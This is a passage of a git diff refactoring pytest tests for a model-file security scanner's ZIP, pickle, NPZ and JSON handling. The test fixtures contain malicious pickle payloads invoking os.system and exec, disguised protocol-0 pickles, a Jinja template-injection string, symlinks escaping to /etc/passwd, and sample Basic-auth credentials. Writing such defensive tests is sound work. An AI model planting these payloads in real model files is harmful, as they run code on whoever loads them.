test_scan_nested_file_oversized_generic_json_with_mxnet_heads_shape_fails_closed( @@ -7391,10 +6197,7 @@ def test_scan_nested_file_oversized_generic_json_with_mxnet_heads_shape_fails_cl encoding="utf-8", ) - result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) - - assert result.success is False - assert result.metadata["operational_error_reason"] == "mxnet_symbol_routing_incomplete" + _assert_nested_mxnet_routing_incomplete(extracted_member) def test_scan_nested_file_oversized_generic_json_with_hidden_mxnet_graph_fails_closed( @@ -7411,10 +6214,7 @@ def test_scan_nested_file_oversized_generic_json_with_hidden_mxnet_graph_fails_c encoding="utf-8", ) - result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) - - assert result.success is False - assert result.metadata["operational_error_reason"] == "mxnet_symbol_routing_incomplete" + _assert_nested_mxnet_routing_incomplete(extracted_member) def test_zip_scanner_marks_configured_skipped_archive_entries_incomplete(tmp_path: Path) -> None: @@ -7636,12 +6436,7 @@ def test_scan_zip_preserves_findings_when_nested_keras_scanner_is_unavailable( with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("nested.keras", nested_keras.getvalue()) - original_load_scanner = _registry._load_scanner - - def load_scanner(scanner_id: str) -> type[BaseScanner] | None: - if scanner_id == "keras_zip": - return None - return original_load_scanner(scanner_id) + load_scanner = without_keras_zip_scanner(_registry._load_scanner) monkeypatch.setattr(_registry, "_load_scanner", load_scanner) @@ -7705,43 +6500,31 @@ def test_can_handle_does_not_claim_stray_local_header_bytes(self, tmp_path: Path assert ZipScanner.can_handle(str(model_path)) is False - def test_symlink_outside_extraction_root(self): - """Symlinks resolving outside the extraction root should be flagged.""" + def _assert_escaping_symlink(self, member_name: str, target: str, message_fragment: str) -> None: with tempfile.NamedTemporaryFile(suffix=".zip", delete=False) as tmp: with zipfile.ZipFile(tmp.name, "w") as z: import stat - info = zipfile.ZipInfo("link.txt") + info = zipfile.ZipInfo(member_name) info.create_system = 3 info.external_attr = (stat.S_IFLNK | 0o777) << 16 - z.writestr(info, "../evil.txt") + z.writestr(info, target) tmp_path = tmp.name try: result = self.scanner.scan(tmp_path) symlink_issues = [i for i in result.issues if "symlink" in i.message.lower()] - assert any("outside" in i.message.lower() for i in symlink_issues) + assert any(message_fragment in i.message.lower() for i in symlink_issues) finally: os.unlink(tmp_path) + def test_symlink_outside_extraction_root(self): + """Symlinks resolving outside the extraction root should be flagged.""" + self._assert_escaping_symlink(("link.txt"), ("../evil.txt"), ("outside")) + def test_symlink_to_critical_path(self): """Symlinks targeting critical system paths should be flagged.""" - with tempfile.NamedTemporaryFile(suffix=".zip", delete=False) as tmp: - with zipfile.ZipFile(tmp.name, "w") as z: - import stat - - info = zipfile.ZipInfo("etc_passwd") - info.create_system = 3 - info.external_attr = (stat.S_IFLNK | 0o777) << 16 - z.writestr(info, "/etc/passwd") - tmp_path = tmp.name - - try: - result = self.scanner.scan(tmp_path) - symlink_issues = [i for i in result.issues if "symlink" in i.message.lower()] - assert any("critical system" in i.message.lower() for i in symlink_issues) - finally: - os.unlink(tmp_path) + self._assert_escaping_symlink(("etc_passwd"), ("/etc/passwd"), ("critical system")) def test_dos_entry_with_unix_symlink_bits_is_scanned_as_regular_file(self, tmp_path: Path) -> None: archive_path = tmp_path / "fake-symlink.zip" @@ -8298,9 +7081,7 @@ def test_zip_bomb_detection(self, tmp_path: Path) -> None: nested_scan_paths: list[str] = [] - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - nested_scan_paths.append(path) - return ScanResult(scanner_name="test") + nested_scan = _nested_scan_recorder(nested_scan_paths, finish=False) scanner = ZipScanner(config={NESTED_SCAN_CALLBACK_CONFIG_KEY: nested_scan}) result = scanner.scan(str(archive_path)) @@ -8322,9 +7103,7 @@ def test_small_high_compression_ratio_entry_stays_clean(self, tmp_path: Path) -> nested_scan_paths: list[str] = [] - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - nested_scan_paths.append(path) - return ScanResult(scanner_name="test") + nested_scan = _nested_scan_recorder(nested_scan_paths, finish=False) scanner = ZipScanner(config={NESTED_SCAN_CALLBACK_CONFIG_KEY: nested_scan}) result = scanner.scan(str(archive_path)) @@ -8350,11 +7129,7 @@ def test_configured_skip_entry_is_incomplete_and_not_recursively_scanned(self, t nested_scan_paths: list[str] = [] - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - nested_scan_paths.append(path) - result = ScanResult(scanner_name="test") - result.finish(success=True) - return result + nested_scan = _nested_scan_recorder(nested_scan_paths) scanner = ZipScanner( config={ @@ -8385,11 +7160,7 @@ def test_security_only_entry_preserves_generic_security_scan_without_nested_disp nested_scan_paths: list[str] = [] - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - nested_scan_paths.append(path) - result = ScanResult(scanner_name="test") - result.finish(success=True) - return result + nested_scan = _nested_scan_recorder(nested_scan_paths) result = ZipScanner( config={ @@ -8420,11 +7191,7 @@ def test_security_only_benign_entry_stays_clean_without_nested_dispatch(self, tm nested_scan_paths: list[str] = [] - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - nested_scan_paths.append(path) - result = ScanResult(scanner_name="test") - result.finish(success=True) - return result + nested_scan = _nested_scan_recorder(nested_scan_paths) result = ZipScanner( config={ @@ -8453,11 +7220,7 @@ def test_content_only_entry_dispatches_without_untrusted_suffix(self, tmp_path: nested_scan_paths: list[str] = [] - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - nested_scan_paths.append(path) - result = ScanResult(scanner_name="test") - result.finish(success=True) - return result + nested_scan = _nested_scan_recorder(nested_scan_paths) result = ZipScanner( config={ @@ -8485,9 +7248,7 @@ def test_zip_bomb_detection_skips_only_suspicious_entry(self, tmp_path: Path) -> nested_scan_paths: list[str] = [] - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - nested_scan_paths.append(path) - return ScanResult(scanner_name="test") + nested_scan = _nested_scan_recorder(nested_scan_paths, finish=False) scanner = ZipScanner(config={NESTED_SCAN_CALLBACK_CONFIG_KEY: nested_scan}) result = scanner.scan(str(archive_path)) @@ -9451,14 +8212,6 @@ def test_large_archive_extra_data_record_before_directory_still_scans(self, tmp_ with zipfile.ZipFile(archive_path) as archive: assert archive.namelist() == ["safe.txt"] - class ReadTrackingBuffer(io.BytesIO): - bytes_read = 0 - - def read(self, size: int | None = -1) -> bytes: - data = super().read(size) - self.bytes_read += len(data) - return data - tracked_archive = ReadTrackingBuffer(archive_path.read_bytes()) assert ZipScanner._preflight_zip_directory( tracked_archive, @@ -9984,31 +8737,13 @@ def fail_zipfile_open(*_args: Any, **_kwargs: Any) -> Any: ) def test_trailing_local_header_near_match_remains_clean(self, tmp_path: Path) -> None: - archive_path = tmp_path / "trailing_local_header_near_match.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("safe.txt", "safe") - archive_path.write_bytes(archive_path.read_bytes() + b"PK\x03\x05 benign trailer") - - result = ZipScanner().scan(str(archive_path)) - - assert result.success is True - assert not any( - check.name == "ZIP Central Directory Preflight" and check.status == CheckStatus.FAILED - for check in result.checks + _assert_zip_trailer_near_match( + tmp_path, ("trailing_local_header_near_match.zip"), (b"PK\x03\x05 benign trailer") ) def test_trailing_local_header_signature_without_record_remains_clean(self, tmp_path: Path) -> None: - archive_path = tmp_path / "trailing_local_header_signature.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("safe.txt", "safe") - archive_path.write_bytes(archive_path.read_bytes() + b"benign trailer PK\x03\x04 not a local record") - - result = ZipScanner().scan(str(archive_path)) - - assert result.success is True - assert not any( - check.name == "ZIP Central Directory Preflight" and check.status == CheckStatus.FAILED - for check in result.checks + _assert_zip_trailer_near_match( + tmp_path, ("trailing_local_header_signature.zip"), (b"benign trailer PK\x03\x04 not a local record") ) def test_local_entry_candidate_payload_validation_has_total_work_budget(self) -> None: @@ -10024,14 +8759,6 @@ def test_local_entry_candidate_payload_validation_has_total_work_budget(self) -> payload[offset : offset + 30] = header payload[offset + 30] = ord("x") - class ReadTrackingBuffer(io.BytesIO): - bytes_read = 0 - - def read(self, size: int | None = -1) -> bytes: - data = super().read(size) - self.bytes_read += len(data) - return data - handle = ReadTrackingBuffer(payload) with pytest.raises(zip_scanner_module._InvalidZipDirectory, match="bounded work budget"): ZipScanner._has_unreferenced_local_entry_ending_at(handle, len(payload)) @@ -10561,12 +9288,7 @@ def test_core_zip_partial_nested_scan_without_findings_returns_exit_code_2(self, with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("member.bin", b"payload") - def nested_scan(_path: str, _config: dict[str, Any]) -> ScanResult: - nested_result = ScanResult(scanner_name="test_nested") - nested_result.finish(success=False) - return nested_result - - scan_kwargs: dict[str, Any] = {NESTED_SCAN_CALLBACK_CONFIG_KEY: nested_scan} + scan_kwargs: dict[str, Any] = {NESTED_SCAN_CALLBACK_CONFIG_KEY: scan_nested_unsuccessful} audit_result = core.scan_model_directory_or_file( str(archive_path), cache_enabled=False, @@ -10636,18 +9358,6 @@ def test_zip_nested_critical_finding_does_not_mark_archive_incomplete(self, tmp_ with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("model.pkl", b"payload") - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - nested_result = ScanResult(scanner_name="test_nested") - nested_result.add_check( - name="Nested Critical Finding", - passed=False, - message="Nested member is malicious", - severity=IssueSeverity.CRITICAL, - location=path, - ) - nested_result.finish(success=False) - return nested_result - result = ZipScanner(config={NESTED_SCAN_CALLBACK_CONFIG_KEY: nested_scan}).scan(str(archive_path)) assert result.success is False @@ -10823,11 +9533,7 @@ def test_scan_zip_with_dangerous_pickle(self): import os as os_module import pickle - class DangerousClass: - def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: - return (os_module.system, ("echo pwned",)) - - dangerous_obj = DangerousClass() + dangerous_obj = SystemCommandPayload("echo pwned", lambda: os_module.system) pickle_data = pickle.dumps(dangerous_obj) z.writestr("dangerous.pkl", pickle_data) tmp_path = tmp.name @@ -10847,11 +9553,10 @@ def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: finally: os.unlink(tmp_path) - def test_scan_zip_with_proto0_pickle_disguised_as_text(self, tmp_path: Path) -> None: - """Protocol 0 pickle in .txt entry should still be detected as pickle content.""" - archive_path = tmp_path / "proto0_payload.zip" + def _assert_disguised_pickle(self, tmp_path: Path, filename: str, payload: bytes) -> None: + archive_path = tmp_path / filename with zipfile.ZipFile(archive_path, "w") as z: - z.writestr("payload.txt", b'cos\nsystem\n(S"echo pwned"\ntR.') + z.writestr("payload.txt", payload) result = self.scanner.scan(str(archive_path)) assert result.success is False @@ -10864,32 +9569,21 @@ def test_scan_zip_with_proto0_pickle_disguised_as_text(self, tmp_path: Path) -> f"Expected critical os/posix.system issue, got: {critical_messages}" ) + def test_scan_zip_with_proto0_pickle_disguised_as_text(self, tmp_path: Path) -> None: + """Protocol 0 pickle in .txt entry should still be detected as pickle content.""" + self._assert_disguised_pickle(tmp_path, ("proto0_payload.zip"), (b'cos\nsystem\n(S"echo pwned"\ntR.')) + def test_scan_zip_with_prefixed_proto0_pickle_disguised_as_text(self, tmp_path: Path) -> None: """Protocol 0 pickles with MARK/LIST prefixes in .txt entries should be detected.""" - archive_path = tmp_path / "proto0_prefixed_payload.zip" - with zipfile.ZipFile(archive_path, "w") as z: - z.writestr("payload.txt", b'(lp0\n0cos\nsystem\n(S"echo pwned"\ntR.') - - result = self.scanner.scan(str(archive_path)) - assert result.success is False - assert result.has_errors is True - - critical_messages = [ - issue.message.lower() for issue in result.issues if issue.severity == IssueSeverity.CRITICAL - ] - assert any("os.system" in msg or "posix.system" in msg for msg in critical_messages), ( - f"Expected critical os/posix.system issue, got: {critical_messages}" - ) + self._assert_disguised_pickle( + tmp_path, ("proto0_prefixed_payload.zip"), (b'(lp0\n0cos\nsystem\n(S"echo pwned"\ntR.') + ) def test_scan_npz_with_object_member_recurses_into_pickle(self, tmp_path: Path) -> None: import numpy as np - class _ExecPayload: - def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: - return (exec, ("print('owned')",)) - archive_path = tmp_path / "payload.npz" - np.savez(archive_path, safe=np.arange(3), payload=np.array([_ExecPayload()], dtype=object)) + np.savez(archive_path, safe=np.arange(3), payload=np.array([ExecPayload()], dtype=object)) result = self.scanner.scan(str(archive_path)) assert result.success is False @@ -10905,15 +9599,11 @@ def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: def test_scan_outer_zip_preserves_nested_npz_member_context(self, tmp_path: Path) -> None: import numpy as np - class _ExecPayload: - def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: - return (exec, ("print('owned')",)) - inner_npz = tmp_path / "inner.npz" np.savez( inner_npz, - payload_a=np.array([_ExecPayload()], dtype=object), - payload_b=np.array([_ExecPayload()], dtype=object), + payload_a=np.array([ExecPayload()], dtype=object), + payload_b=np.array([ExecPayload()], dtype=object), ) archive_path = tmp_path / "outer.zip" @@ -10956,14 +9646,9 @@ def test_scan_zip_audio_tokenizer_readme_basic_links_not_basic_auth_secret(self, with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("audio_tokenizer/README.md", "Provide the basic links for the model\n") - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - from modelaudit.scanners.text_scanner import TextScanner - - return TextScanner(config={"check_network_comm": False, "cache_enabled": False}).scan(path) - result = ZipScanner( config={ - NESTED_SCAN_CALLBACK_CONFIG_KEY: nested_scan, + NESTED_SCAN_CALLBACK_CONFIG_KEY: _scan_text_nested_member, ZIP_CONTENT_ONLY_MEMBER_ENTRIES_CONFIG_KEY: ["audio_tokenizer/README.md"], } ).scan(str(archive_path)) @@ -10988,14 +9673,9 @@ def test_scan_zip_text_member_detects_valid_basic_auth_header(self, tmp_path: Pa with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("README.md", "Proxy-Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\n") - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - from modelaudit.scanners.text_scanner import TextScanner - - return TextScanner(config={"check_network_comm": False, "cache_enabled": False}).scan(path) - result = ZipScanner( config={ - NESTED_SCAN_CALLBACK_CONFIG_KEY: nested_scan, + NESTED_SCAN_CALLBACK_CONFIG_KEY: _scan_text_nested_member, ZIP_CONTENT_ONLY_MEMBER_ENTRIES_CONFIG_KEY: ["README.md"], } ).scan(str(archive_path)) @@ -11075,63 +9755,23 @@ def test_scan_zip_long_preserved_readme_member_cleans_tempdir( assert list(temp_root.iterdir()) == [] def test_scan_nested_zip_text_member_detects_valid_basic_auth_header(self, tmp_path: Path) -> None: - inner_payload = io.BytesIO() - with zipfile.ZipFile(inner_payload, "w") as inner_archive: - inner_archive.writestr("README.md", "Authorization: Basic dXNlcjpwYXNz\n") - - archive_path = tmp_path / "nested_headers.zip" - with zipfile.ZipFile(archive_path, "w") as outer_archive: - outer_archive.writestr("nested/inner.zip", inner_payload.getvalue()) - - result = core.scan_file( - str(archive_path), - config={ - "cache_scan_results": False, - "check_network_comm": False, - }, + _assert_nested_secret_header( + tmp_path, + ("README.md"), + ("Authorization: Basic dXNlcjpwYXNz\n"), + ("nested_headers.zip"), + ("nested/inner.zip:README.md"), ) - failed_secret_checks = [ - check - for check in result.checks - if check.name == "Embedded Secrets Detection" - and check.status == CheckStatus.FAILED - and check.details.get("secret_type") == "Basic Auth Credentials" - ] - assert result.success is False - assert failed_secret_checks - assert failed_secret_checks[0].rule_code == "S702" - assert failed_secret_checks[0].details.get("zip_entry") == "nested/inner.zip:README.md" - def test_scan_nested_zip_env_member_detects_basic_auth_server_header(self, tmp_path: Path) -> None: - inner_payload = io.BytesIO() - with zipfile.ZipFile(inner_payload, "w") as inner_archive: - inner_archive.writestr(".env", "HTTP_AUTHORIZATION=Basic bmVzdGVkLWVudjpwYXNz\n") - - archive_path = tmp_path / "nested_env.zip" - with zipfile.ZipFile(archive_path, "w") as outer_archive: - outer_archive.writestr("nested/inner.zip", inner_payload.getvalue()) - - result = core.scan_file( - str(archive_path), - config={ - "cache_scan_results": False, - "check_network_comm": False, - }, + _assert_nested_secret_header( + tmp_path, + (".env"), + ("HTTP_AUTHORIZATION=Basic bmVzdGVkLWVudjpwYXNz\n"), + ("nested_env.zip"), + ("nested/inner.zip:.env"), ) - failed_secret_checks = [ - check - for check in result.checks - if check.name == "Embedded Secrets Detection" - and check.status == CheckStatus.FAILED - and check.details.get("secret_type") == "Basic Auth Credentials" - ] - assert result.success is False - assert failed_secret_checks - assert failed_secret_checks[0].rule_code == "S702" - assert failed_secret_checks[0].details.get("zip_entry") == "nested/inner.zip:.env" - def test_scan_zip_with_proto0_pickle_with_single_comment_token_bypass_regression(self, tmp_path: Path) -> None: """Single comment-token prefix must not suppress proto0 payload detection.""" archive_path = tmp_path / "proto0_comment_prefixed_payload.zip" @@ -11246,9 +9886,7 @@ def test_scan_truncated_zip(self, tmp_path: Path) -> None: def _scan_python_member_checks(tmp_path: Path, source: str) -> dict[str | None, Any]: """Scan ``source`` as a Python archive member; return failed checks by rule code.""" archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") return { check.rule_code: check for check in result.checks @@ -11326,9 +9964,329 @@ def test_scan_zip_pr1402_fails_closed_on_deeply_nested_member(tmp_path: Path) -> # analysis fails closed (marked incomplete) instead. source = "import ctypes\nctypes.cdll" + ".a" * 6000 + "\n" archive_path = tmp_path / "deep.zip" + result = _scan_python_zip_member(archive_path, source, "handler.py") + + assert any(check.details.get("analysis_incomplete") for check in result.checks) + + +def _scan_text_nested_member(path: str, _config: dict[str, Any]) -> ScanResult: + from modelaudit.scanners.text_scanner import TextScanner + + return TextScanner(config={"check_network_comm": False, "cache_enabled": False}).scan(path) + + +def _disable_skops_scanner(monkeypatch: pytest.MonkeyPatch) -> None: + original_loader = _registry.load_scanner_by_id + + def load_scanner_by_id(scanner_id: str) -> type[BaseScanner] | None: + if scanner_id == "skops": + return None + return original_loader(scanner_id) + + monkeypatch.setattr(_registry, "load_scanner_by_id", load_scanner_by_id) + + +def _assert_zip_builtin_eval_rule(tmp_path: Path, source: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + _assert_zip_python_finding_at_path(archive_path, source, "S104", "high-risk calls: builtins.eval") + + +def _assert_zip_python_member_safe(tmp_path: Path, source: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + _assert_zip_python_member_safe_at_path(archive_path, source) + + +def _assert_zip_python_rule(tmp_path: Path, source: str, rule_code: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + _assert_zip_python_rule_at_path(archive_path, source, rule_code) + + +def _assert_zip_python_member_safe_at_path(archive_path: Path, source: str) -> None: + result = _scan_python_zip_member(archive_path, source, "handler.py") + + assert not any( + check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks + ) + + +def _assert_zip_python_finding_at_path(archive_path: Path, source: str | bytes, rule_code: str, reason: str) -> None: + result = _scan_python_zip_member(archive_path, source, "handler.py") + + python_checks = [ + check + for check in result.checks + if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED + ] + assert len(python_checks) == 1 + assert python_checks[0].rule_code == rule_code + assert python_checks[0].details["reason"] == reason + + +def _assert_zip_python_rule_at_path(archive_path: Path, source: str, rule_code: str) -> None: + result = _scan_python_zip_member(archive_path, source, "handler.py") + + assert any( + check.name == "Python Archive Member Security" + and check.status == CheckStatus.FAILED + and check.rule_code == rule_code + for check in result.checks + ) + + +def _assert_zip_member_subprocess_call(tmp_path: Path, source_text: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + source = source_text + result = _scan_python_zip_member(archive_path, source, "handler.py") + + python_checks = [ + check + for check in result.checks + if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED + ] + assert len(python_checks) == 1 + assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + + +def _assert_executable_near_match(tmp_path: Path, member_name: str, magic: bytes) -> None: + archive_path = tmp_path / "model_bundle.npz" with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) + archive.writestr("arrays.npy", _npy_payload()) + archive.writestr(member_name, magic + b"\x00" * 64) result = ZipScanner().scan(str(archive_path)) - assert any(check.details.get("analysis_incomplete") for check in result.checks) + assert not any(check.name == "Executable Archive Member Detection" for check in result.checks) + + +def _assert_shadowed_member_primitive(tmp_path: Path, source: str, filename: str) -> None: + archive_path = tmp_path / filename + result = _scan_python_zip_member(archive_path, source, "handler.py") + + assert result.success is True + assert not any( + check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks + ) + + +def _assert_generic_json_owner(tmp_path: Path, prefix: str) -> None: + extracted_member = tmp_path / "config.json" + extracted_member.write_text( + prefix + ",".join("0" for _ in range(5000)) + "]}", + encoding="utf-8", + ) + + result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) + + assert result.scanner_name == "manifest" + assert "mxnet_symbol_routing_incomplete" not in result.metadata.get("scan_outcome_reasons", []) + + +def _assert_zip_trailer_near_match(tmp_path: Path, filename: str, trailer: bytes) -> None: + archive_path = tmp_path / filename + with zipfile.ZipFile(archive_path, "w") as archive: + archive.writestr("safe.txt", "safe") + archive_path.write_bytes(archive_path.read_bytes() + trailer) + + result = ZipScanner().scan(str(archive_path)) + + assert result.success is True + assert not any( + check.name == "ZIP Central Directory Preflight" and check.status == CheckStatus.FAILED + for check in result.checks + ) + + +def _assert_xgboost_jinja_preserved(tmp_path: Path, filename: str) -> None: + extracted_member = tmp_path / filename + extracted_member.write_text( + '{"version":[1,7,4],"learner":{"gradient_booster":{}},' + '"chat_template":"{{ \'\'.__class__.__mro__[1].__subclasses__() }}"}', + encoding="utf-8", + ) + + result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) + + assert result.scanner_name == "xgboost" + assert any( + check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED + for check in result.checks + ) + + +def _assert_ctypes_module_replacement(tmp_path: Path, source_text: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + source = source_text + result = _scan_python_zip_member(archive_path, source, "handler.py") + + assert any( + check.name == "Python Archive Member Security" + and check.status == CheckStatus.FAILED + and check.rule_code == "S110" + and check.details["reason"] == "high-risk calls: ctypes.CDLL" + for check in result.checks + ) + + +def _assert_ambiguous_mxnet_jinja(tmp_path: Path, monkeypatch: pytest.MonkeyPatch, filename: str) -> None: + monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 256) + extracted_member = tmp_path / filename + extracted_member.write_text( + '{"heads":[[0,0,0]],"chat_template":"{{ \'\'.__class__.__mro__[1].__subclasses__() }}","nodes":[{"attrs":"' + + ("x" * 300) + + '","op":"Custom","name":"load"}],"arg_nodes":[0]}', + encoding="utf-8", + ) + + result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) + + assert result.success is False + assert "mxnet_symbol_routing_incomplete" in result.metadata["scan_outcome_reasons"] + assert any( + check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED + for check in result.checks + ) + + +def _assert_zip_shadowed_import(tmp_path: Path, source_text: str) -> None: + archive_path = tmp_path / "source_bundle.zip" + source = source_text + result = _scan_python_zip_member(archive_path, source, "preprocess.py") + + assert result.success is True + assert not any(check.name == "Python Archive Member Security" for check in result.checks) + assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + + +def _assert_zip_subprocess_warning(tmp_path: Path, source_text: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + source = source_text + result = _scan_python_zip_member(archive_path, source, "handler.py") + + python_checks = [ + check + for check in result.checks + if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED + ] + assert len(python_checks) == 1 + assert python_checks[0].severity == IssueSeverity.WARNING + assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + + +def _assert_conditional_member_risk(tmp_path: Path, source_text: str, reason: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + source = source_text + result = _scan_python_zip_member(archive_path, source, "handler.py") + + python_checks = [ + check + for check in result.checks + if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED + ] + checks_by_rule = {check.rule_code: check for check in python_checks} + assert checks_by_rule["S109"].details["reason"] == "high-risk calls: webbrowser.open" + assert checks_by_rule["S110"].details["reason"] == reason + + +def _assert_loader_accessors(tmp_path: Path, source_text: str, first_call: str, second_call: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + source = source_text + result = _scan_python_zip_member(archive_path, source, "handler.py") + + python_checks = [ + check + for check in result.checks + if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED + ] + checks_by_rule = {check.rule_code: check for check in python_checks} + assert set(checks_by_rule) == {"S110"} + s110_reason = checks_by_rule["S110"].details["reason"] + assert first_call in s110_reason + assert second_call in s110_reason + + +def _assert_zip_system_call(tmp_path: Path, source_text: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + source = source_text + result = _scan_python_zip_member(archive_path, source, "handler.py") + + python_checks = [ + check + for check in result.checks + if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED + ] + assert len(python_checks) == 1 + assert python_checks[0].severity == IssueSeverity.WARNING + assert python_checks[0].rule_code == "S101" + assert python_checks[0].details["reason"] == "high-risk calls: os.system" + + +def _assert_nested_secret_header( + tmp_path: Path, member_name: str, content: str, filename: str, expected_location: str +) -> None: + inner_payload = io.BytesIO() + with zipfile.ZipFile(inner_payload, "w") as inner_archive: + inner_archive.writestr(member_name, content) + + archive_path = tmp_path / filename + with zipfile.ZipFile(archive_path, "w") as outer_archive: + outer_archive.writestr("nested/inner.zip", inner_payload.getvalue()) + + result = core.scan_file( + str(archive_path), + config={ + "cache_scan_results": False, + "check_network_comm": False, + }, + ) + + failed_secret_checks = [ + check + for check in result.checks + if check.name == "Embedded Secrets Detection" + and check.status == CheckStatus.FAILED + and check.details.get("secret_type") == "Basic Auth Credentials" + ] + assert result.success is False + assert failed_secret_checks + assert failed_secret_checks[0].rule_code == "S702" + assert failed_secret_checks[0].details.get("zip_entry") == expected_location + + +def _assert_zip_python_member_warning(tmp_path: Path, source_text: str, entry_key: str, member_name: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + result = _scan_python_zip_member(archive_path, source_text, "handler.py") + + python_checks = [ + check + for check in result.checks + if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED + ] + assert len(python_checks) == 1 + assert python_checks[0].severity == IssueSeverity.WARNING + assert python_checks[0].details[entry_key] == member_name + + +def _assert_zip_without_rule(tmp_path: Path, source_text: str, rule_code: str) -> None: + archive_path = tmp_path / "model_bundle.zip" + source = source_text + result = _scan_python_zip_member(archive_path, source, "handler.py") + + assert not any( + check.name == "Python Archive Member Security" + and check.status == CheckStatus.FAILED + and check.rule_code == rule_code + for check in result.checks + ) + + +def _scan_python_zip_member(archive_path: Path, source: str | bytes, member_name: str) -> ScanResult: + with zipfile.ZipFile(archive_path, "w") as archive: + archive.writestr(member_name, source) + result = ZipScanner().scan(str(archive_path)) + return result + + +def _assert_nested_mxnet_routing_incomplete(extracted_member: Path) -> None: + result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) + assert result.success is False + assert result.metadata["operational_error_reason"] == "mxnet_symbol_routing_incomplete" diff --git a/tests/test_auth_config.py b/tests/test_auth_config.py index 1a87e11ac..9c7d1ff85 100644 --- a/tests/test_auth_config.py +++ b/tests/test_auth_config.py @@ -1,5 +1,6 @@ import os import stat +from collections.abc import Callable from pathlib import Path from types import ModuleType from typing import Any @@ -683,13 +684,9 @@ def test_auth_login_accepts_explicit_enterprise_https_host(monkeypatch: pytest.M fake_config = _FakeCloudConfig() requested_urls: list[str] = [] - def fake_fetch(url: str, **_kwargs: Any) -> _FakeResponse: - requested_urls.append(url) - return _FakeResponse() - monkeypatch.setenv("MODELAUDIT_API_ALLOWED_HOSTS", "enterprise.example") monkeypatch.setattr(auth_client_module, "cloud_config", fake_config) - monkeypatch.setattr(auth_client_module, "fetch_with_proxy", fake_fetch) + monkeypatch.setattr(auth_client_module, "fetch_with_proxy", _recording_fetch(requested_urls)) monkeypatch.setattr("modelaudit.cli.get_user_email", lambda: None) monkeypatch.setattr("modelaudit.cli.set_user_email", lambda _email: None) @@ -712,13 +709,9 @@ def test_auth_login_uses_environment_host_instead_of_persisted_host(monkeypatch: fake_config = _FakeCloudConfig(api_host="https://old.promptfoo.app") requested_urls: list[str] = [] - def fake_fetch(url: str, **_kwargs: Any) -> _FakeResponse: - requested_urls.append(url) - return _FakeResponse() - monkeypatch.setenv("MODELAUDIT_API_HOST", "https://enterprise.example:8443") monkeypatch.setattr(auth_client_module, "cloud_config", fake_config) - monkeypatch.setattr(auth_client_module, "fetch_with_proxy", fake_fetch) + monkeypatch.setattr(auth_client_module, "fetch_with_proxy", _recording_fetch(requested_urls)) monkeypatch.setattr("modelaudit.cli.get_user_email", lambda: None) monkeypatch.setattr("modelaudit.cli.set_user_email", lambda _email: None) @@ -749,14 +742,9 @@ def test_validate_and_set_api_token_accepts_configured_host_and_stores_normalize requested_urls: list[str] = [] requested_kwargs: list[dict[str, Any]] = [] - def fake_fetch(url: str, **kwargs: Any) -> _FakeResponse: - requested_urls.append(url) - requested_kwargs.append(kwargs) - return _FakeResponse() - monkeypatch.setenv("MODELAUDIT_API_ALLOWED_HOSTS", "enterprise.example") monkeypatch.setattr(auth_client_module, "cloud_config", fake_config) - monkeypatch.setattr(auth_client_module, "fetch_with_proxy", fake_fetch) + monkeypatch.setattr(auth_client_module, "fetch_with_proxy", 